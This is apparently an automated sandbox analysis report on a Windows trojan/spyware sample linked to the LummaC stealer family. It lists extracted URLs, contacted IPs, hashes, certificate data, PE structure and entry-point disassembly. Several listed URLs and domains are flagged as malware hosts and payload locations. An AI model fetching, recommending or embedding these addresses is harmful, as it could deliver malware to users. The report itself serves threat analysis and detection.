                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://qt-project.org/BDxsBr8Dce.exefalse
                                                                high
                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctaBDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.mozilla.org/products/firefoxgro.allBDxsBr8Dce.exe, 00000000.00000003.1647439842.0000000004A84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://poweryressz.click/BDxsBr8Dce.exe, 00000000.00000003.1599778820.0000000001D6B000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386465145.0000000001CEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://kliplorihoe0.shop/int_clp_ldr_pan.txt537.36BDxsBr8Dce.exe, 00000000.00000002.3237666672.0000000003D4A000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.phreedom.org/md5)BDxsBr8Dce.exefalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://sectigo.com/CPS0BDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://kliplorihoe0.shop/int_clp_ldr_pan.txtfuBDxsBr8Dce.exe, 00000000.00000003.2386465145.0000000001D04000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3236997897.0000000001D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoBDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://xml.org/sax/features/namespacesBDxsBr8Dce.exefalse
                                                                            high
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://poweryressz.click/apihBDxsBr8Dce.exe, 00000000.00000003.1668762965.0000000001D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://ocsp.rootca1.amazontrust.com0:BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  ftp://.modeBDxsBr8Dce.exefalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://poweryressz.click/apiaBDxsBr8Dce.exe, 00000000.00000003.1668762965.0000000001D77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.ecosia.org/newtab/BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBDxsBr8Dce.exe, 00000000.00000003.1647439842.0000000004A84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.BDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://ac.ecosia.org/autocomplete?q=BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://slotwang.com/file/SigmaHealth.exeBDxsBr8Dce.exe, 00000000.00000003.2386465145.0000000001D04000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3236997897.0000000001D04000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zBDxsBr8Dce.exe, 00000000.00000003.1549536823.0000000004A94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://qt-project.org/xml/features/report-start-end-entityBDxsBr8Dce.exefalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?BDxsBr8Dce.exe, 00000000.00000003.1646404644.0000000004818000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uBDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://trolltech.com/xml/features/report-start-end-entityBDxsBr8Dce.exefalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgBDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiBDxsBr8Dce.exe, 00000000.00000003.1647849824.00000000047E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://bugreports.qt.io/Microsoft-IIS/4.Microsoft-IIS/5.Netscape-Enterprise/3.WebLogicRocketdetectedBDxsBr8Dce.exefalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://trolltech.com/xml/features/report-whitespace-only-CharDataBDxsBr8Dce.exefalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BDxsBr8Dce.exe, 00000000.00000003.1600138824.000000000479C000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600209487.0000000004799000.00000004.00000800.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1600292349.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://qt.digia.com/Product/Licensing/BDxsBr8Dce.exefalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        172.67.182.135
                                                                                                        kliplorihoe0.shopUnited States
                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                        172.67.149.196
                                                                                                        poweryressz.clickUnited States
                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1574812
                                                                                                        Start date and time:2024-12-13 16:47:15 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 7m 56s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Run name:Run with higher sleep bypass
                                                                                                        Number of analysed new started processes analysed:6
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:BDxsBr8Dce.exe
                                                                                                        renamed because original name is a hash value
                                                                                                        Original Sample Name:88a3030a577480dfb9a870e40d94fe78ed3c66408332a76178c3efcb26a9b91b.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        • Number of executed functions: 2
                                                                                                        • Number of non-executed functions: 94
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                        • VT rate limit hit for: BDxsBr8Dce.exe
                                                                                                        No simulations
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        172.67.149.196https://gift-card-granny10.myfreesites.net/Get hashmaliciousUnknownBrowse
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          s-part-0035.t-0009.t-msedge.netd2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                                                          • 13.107.246.63
                                                                                                          https://poplast-poplast.powerappsportals.com/?e=e83cfd89&h=e7e60467&f=y&p=y&l=1Get hashmaliciousUnknownBrowse
                                                                                                          • 13.107.246.63
                                                                                                          https://t.co/4MnukUbNZXGet hashmaliciousUnknownBrowse
                                                                                                          • 13.107.246.63
                                                                                                          SoundDrv.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                          • 13.107.246.63
                                                                                                          https://nam.dcv.ms/0CX72IqyxfGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 13.107.246.63
                                                                                                          ALGKSLPKD8.docGet hashmaliciousUnknownBrowse
                                                                                                          • 13.107.246.63
                                                                                                          https://app.seesaw.me/pages/shared_item?item_id=item.458620ed-6ab6-4874-8a90-aa31b75d3cd6&share_token=lEkLLLT6TUehqWhupDFOAA&mode=shareGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                          • 13.107.246.63
                                                                                                          17340930102031dcdc4a249f5e0ed34fe8c1887a544d2e39d1f54731472cf7d932223abe8f769.dat-decoded.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 13.107.246.63
                                                                                                          http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                                                                          • 13.107.246.63
                                                                                                          888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                          • 13.107.246.63
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUSzA6ym8lbRp.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.50.161
                                                                                                          ClipMon.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.32.1
                                                                                                          adv.ps1Get hashmaliciousLummaCBrowse
                                                                                                          • 104.21.22.222
                                                                                                          TjUiFGDyK1.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.142.60
                                                                                                          4KS0DPguYt.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.164.37
                                                                                                          uhYAA1w99W.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.164.37
                                                                                                          tJK7yvtNI4.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.142.60
                                                                                                          https://jzd.soundestlink.com/ce/c/675b6e1bfc42b5dba74070ce/675b749b3d33226215120f3d/675b74b8f9a08fb1fbb286b7?signature=81a859d5cb272e6f3445dc5d43d3615d4aeb95f10d42be0925098a8a87224f29Get hashmaliciousUnknownBrowse
                                                                                                          • 104.21.112.1
                                                                                                          d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.207.38
                                                                                                          X5o3C9xtfa.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.161.5
                                                                                                          CLOUDFLARENETUSzA6ym8lbRp.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.50.161
                                                                                                          ClipMon.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.32.1
                                                                                                          adv.ps1Get hashmaliciousLummaCBrowse
                                                                                                          • 104.21.22.222
                                                                                                          TjUiFGDyK1.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.142.60
                                                                                                          4KS0DPguYt.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.164.37
                                                                                                          uhYAA1w99W.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.164.37
                                                                                                          tJK7yvtNI4.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.142.60
                                                                                                          https://jzd.soundestlink.com/ce/c/675b6e1bfc42b5dba74070ce/675b749b3d33226215120f3d/675b74b8f9a08fb1fbb286b7?signature=81a859d5cb272e6f3445dc5d43d3615d4aeb95f10d42be0925098a8a87224f29Get hashmaliciousUnknownBrowse
                                                                                                          • 104.21.112.1
                                                                                                          d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.207.38
                                                                                                          X5o3C9xtfa.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.161.5
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          a0e9f5d64349fb13191bc781f81f42e1zA6ym8lbRp.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.149.196
                                                                                                          • 172.67.182.135
                                                                                                          ClipMon.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.149.196
                                                                                                          • 172.67.182.135
                                                                                                          adv.ps1Get hashmaliciousLummaCBrowse
                                                                                                          • 172.67.149.196
                                                                                                          • 172.67.182.135
                                                                                                          TjUiFGDyK1.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.149.196
                                                                                                          • 172.67.182.135
                                                                                                          4KS0DPguYt.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.149.196
                                                                                                          • 172.67.182.135
                                                                                                          uhYAA1w99W.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.149.196
                                                                                                          • 172.67.182.135
                                                                                                          tJK7yvtNI4.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.149.196
                                                                                                          • 172.67.182.135
                                                                                                          d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.149.196
                                                                                                          • 172.67.182.135
                                                                                                          X5o3C9xtfa.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.149.196
                                                                                                          • 172.67.182.135
                                                                                                          QnNRjhoN.ps1Get hashmaliciousLummaCBrowse
                                                                                                          • 172.67.149.196
                                                                                                          • 172.67.182.135
                                                                                                          No context
                                                                                                          No created / dropped files found
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.772836512390472
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:BDxsBr8Dce.exe
                                                                                                          File size:15'643'816 bytes
                                                                                                          MD5:94842b12f4a0647db302a5acd53758d7
                                                                                                          SHA1:fde1a2115a054c42a829b3de5351cce9cfeeb564
                                                                                                          SHA256:88a3030a577480dfb9a870e40d94fe78ed3c66408332a76178c3efcb26a9b91b
                                                                                                          SHA512:867598a60160a8edeb596ae0920b86a6f2155794d4f44eb7159870d82b1e77b98e41d62e8f6f411bc3b91b536365358e7f4bd975e2164d0e0a2919c5cb655b03
                                                                                                          SSDEEP:196608:JvPmxX9KZocze1CfBlALdwD7Jsv6tWKFdu9CxxIk:JvPmfgzodZwD7Jsv6tWKFdu9Cj
                                                                                                          TLSH:9EF67DD3F28340B2F685507A249BE6375B34B919471157E7B39C3A4AA9312E23E3F14E
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K.;...U...U...U.I.....U..M....U.....@.U.....\.U.......U.......U.......U.......U...T...U.......U.......U.......U.......U.......U
                                                                                                          Icon Hash:29226ee6b692c62f
                                                                                                          Entrypoint:0xd95f80
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:true
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x556C3EF9 [Mon Jun 1 11:16:09 2015 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:5
                                                                                                          OS Version Minor:1
                                                                                                          File Version Major:5
                                                                                                          File Version Minor:1
                                                                                                          Subsystem Version Major:5
                                                                                                          Subsystem Version Minor:1
                                                                                                          Import Hash:94eb88cfd6185da077c0d4a9413d99d2
                                                                                                          Signature Valid:false
                                                                                                          Signature Issuer:CN=avernus
                                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                          Error Number:-2146762487
                                                                                                          Not Before, Not After
                                                                                                          • 12/12/2024 03:55:56 12/12/2025 04:15:56
                                                                                                          Subject Chain
                                                                                                          • CN=avernus
                                                                                                          Version:3
                                                                                                          Thumbprint MD5:0AA6B66A9D1BAF5F4DA496EDB86C3755
                                                                                                          Thumbprint SHA-1:13242C21E513EDEE956E093F631D3EC18F935285
                                                                                                          Thumbprint SHA-256:7DAC4C42B0A773A1E3A7EF551BCD2A0AA6CB54F5FBCA0664A4BBE2BE529D2EF9
                                                                                                          Serial:79D0A38D138EDEBC4E2AF82FD4E877E8
                                                                                                          Instruction
                                                                                                          call 00007FE20CE076EDh
                                                                                                          jmp 00007FE20CDF5F05h
                                                                                                          push 00000014h
                                                                                                          push 0121FED8h
                                                                                                          call 00007FE20CE0485Fh
                                                                                                          call 00007FE20CE022E1h
                                                                                                          movzx esi, ax
                                                                                                          push 00000002h
                                                                                                          call 00007FE20CE07680h
                                                                                                          pop ecx
                                                                                                          mov eax, 00005A4Dh
                                                                                                          cmp word ptr [00400000h], ax
                                                                                                          je 00007FE20CDF5F06h
                                                                                                          xor ebx, ebx
                                                                                                          jmp 00007FE20CDF5F35h
                                                                                                          mov eax, dword ptr [0040003Ch]
                                                                                                          cmp dword ptr [eax+00400000h], 00004550h
                                                                                                          jne 00007FE20CDF5EEDh
                                                                                                          mov ecx, 0000010Bh
                                                                                                          cmp word ptr [eax+00400018h], cx
                                                                                                          jne 00007FE20CDF5EDFh
                                                                                                          xor ebx, ebx
                                                                                                          cmp dword ptr [eax+00400074h], 0Eh
                                                                                                          jbe 00007FE20CDF5F0Bh
                                                                                                          cmp dword ptr [eax+004000E8h], ebx
                                                                                                          setne bl
                                                                                                          mov dword ptr [ebp-1Ch], ebx
                                                                                                          call 00007FE20CE0485Bh
                                                                                                          test eax, eax
                                                                                                          jne 00007FE20CDF5F0Ah
                                                                                                          push 0000001Ch
                                                                                                          call 00007FE20CDF5FE1h
                                                                                                          pop ecx
                                                                                                          call 00007FE20CE0547Bh
                                                                                                          test eax, eax
                                                                                                          jne 00007FE20CDF5F0Ah
                                                                                                          push 00000010h
                                                                                                          call 00007FE20CDF5FD0h
                                                                                                          pop ecx
                                                                                                          call 00007FE20CE076F9h
                                                                                                          and dword ptr [ebp-04h], 00000000h
                                                                                                          call 00007FE20CE06985h
                                                                                                          test eax, eax
                                                                                                          jns 00007FE20CDF5F0Ah
                                                                                                          push 0000001Bh
                                                                                                          call 00007FE20CDF5FB6h
                                                                                                          pop ecx
                                                                                                          call dword ptr [00DF5404h]
                                                                                                          mov dword ptr [01269958h], eax
                                                                                                          call 00007FE20CE07714h
                                                                                                          mov dword ptr [012661E8h], eax
                                                                                                          call 00007FE20CE070B7h
                                                                                                          test eax, eax
                                                                                                          jns 00007FE20CDF5F0Ah
                                                                                                          Programming Language:
                                                                                                          • [ASM] VS2013 build 21005
                                                                                                          • [C++] VS2013 build 21005
                                                                                                          • [ C ] VS2013 build 21005
                                                                                                          • [ C ] VS2013 UPD3 build 30723
                                                                                                          • [C++] VS2013 UPD3 build 30723
                                                                                                          • [EXP] VS2013 UPD3 build 30723
                                                                                                          • [RES] VS2013 build 21005
                                                                                                          • [LNK] VS2013 UPD3 build 30723
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0xe207300xef31.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe2f6640x104.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xe6d0000xccc0.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xee96300x1e78.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xe7a0000x588c4.reloc
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xdc23a00x40.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x9f50000x788.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x9f37280x9f3800b18222e441b43600db90942213ded1b5unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x9f50000x43cf600x43d000b6c10fb8594594c763893299780038a5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0xe320000x389680x1be0011740baf4f943ddf76f615c9ba7be8a5False0.20684732343049328OpenPGP Public Key5.00222630011365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .qtmetad0xe6b0000x1100x200d2ca3eb8c36f9ad8a09ce73b0803894fFalse0.44921875data2.9687010649031564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                          _RDATA0xe6c0000x1240x2008c48bc5fdfe8016ff88837fdfdf83d8dFalse0.287109375data3.5179322774623993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0xe6d0000xccc00xce00d5f972b48d2fa3f9f15a9fb8ebd415e7False0.2847390776699029data5.906870778192709IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0xe7a0000x8fa000x8fa0050a530347a40674419f9dfb214ba346cFalse0.675126808637946data7.342783542841344IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_ICON0xe6d36c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.37926829268292683
                                                                                                          RT_ICON0xe6d9d40x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.37926829268292683
                                                                                                          RT_ICON0xe6e03c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.5201612903225806
                                                                                                          RT_ICON0xe6e3240x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.5201612903225806
                                                                                                          RT_ICON0xe6e60c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.6486486486486487
                                                                                                          RT_ICON0xe6e7340x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.6486486486486487
                                                                                                          RT_ICON0xe6e85c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.6068763326226013
                                                                                                          RT_ICON0xe6f7040xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.6068763326226013
                                                                                                          RT_ICON0xe705ac0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.8154332129963899
                                                                                                          RT_ICON0xe70e540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.8154332129963899
                                                                                                          RT_ICON0xe716fc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.726878612716763
                                                                                                          RT_ICON0xe71c640x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.726878612716763
                                                                                                          RT_ICON0xe721cc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.41358921161825724
                                                                                                          RT_ICON0xe747740x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.41358921161825724
                                                                                                          RT_ICON0xe76d1c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.6672138836772983
                                                                                                          RT_ICON0xe77dc40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.6672138836772983
                                                                                                          RT_ICON0xe78e6c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.8324468085106383
                                                                                                          RT_ICON0xe792d40x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.8324468085106383
                                                                                                          RT_GROUP_ICON0xe7973c0x84data0.6363636363636364
                                                                                                          RT_GROUP_ICON0xe797c00x84dataEnglishUnited States0.6363636363636364
                                                                                                          RT_MANIFEST0xe798440x479XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4349344978165939
                                                                                                          DLLImport
                                                                                                          CRYPT32.dllCertGetCertificateChain, CertFreeCertificateContext, CertFreeCertificateChain, CertCreateCertificateContext
